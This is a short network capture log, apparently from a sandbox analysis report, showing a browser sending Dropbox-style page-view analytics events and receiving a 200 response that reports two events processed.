2024-12-19 12:45:08 UTC	1543	OUT	Data Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6e 61 6d 65 22 3a 22 76 69 65 77 2e 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 2e 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 22 2c 22 69 64 22 3a 22 35 63 39 35 39 30 39 34 2d 36 36 61 62 2d 34 62 64 35 2d 38 32 36 33 2d 35 39 33 64 37 63 36 37 63 61 65 30 22 2c 22 64 65 74 61 69 6c 22 3a 22 7b 5c 22 65 64 69 73 6f 6e 50 61 67 65 4e 61 6d 65 5c 22 3a 5c 22 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5c 22 2c 5c 22 69 73 4d 6f 62 69 6c 65 57 65 62 5c 22 3a 66 61 6c 73 65 2c 5c 22 77 65 62 52 65 64 65 73 69 67 6e 47 6c 6f 62 61 6c 48 65 61 64 65 72 56 61 72 69 61 6e 74 5c 22 3a 5c 22 6f 66 66 5c 22 2c 5c 22 67 6c 6f 62 61 6c 48 65 61 64 65 72 53 6f 75 72 63 65 5c 22 3a 5c 22 72 73 65 72 Data Ascii: {"events":[{"type":"event","name":"view.global_header.global_header","id":"5c959094-66ab-4bd5-8263-593d7c67cae0","detail":"{\"edisonPageName\":\"scl_oboe_file\",\"isMobileWeb\":false,\"webRedesignGlobalHeaderVariant\":\"off\",\"globalHeaderSource\":\"rser
2024-12-19 12:45:09 UTC	571	IN	HTTP/1.1 200 OK Content-Disposition: attachment Content-Security-Policy: sandbox Content-Type: application/json Pragma: no-cache X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Server-Response-Time: 124 X-Webkit-Csp: sandbox Content-Length: 51 Date: Thu, 19 Dec 2024 12:45:09 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: fa1a81612131407db942e06a76010e26 Connection: close
2024-12-19 12:45:09 UTC	51	IN	Data Raw: 7b 22 6d 73 67 22 3a 22 4d 65 61 73 75 72 65 73 20 70 72 6f 63 65 73 73 65 64 3a 20 30 20 45 76 65 6e 74 73 20 70 72 6f 63 65 73 73 65 64 3a 20 32 22 7d Data Ascii: {"msg":"Measures processed: 0 Events processed: 2"}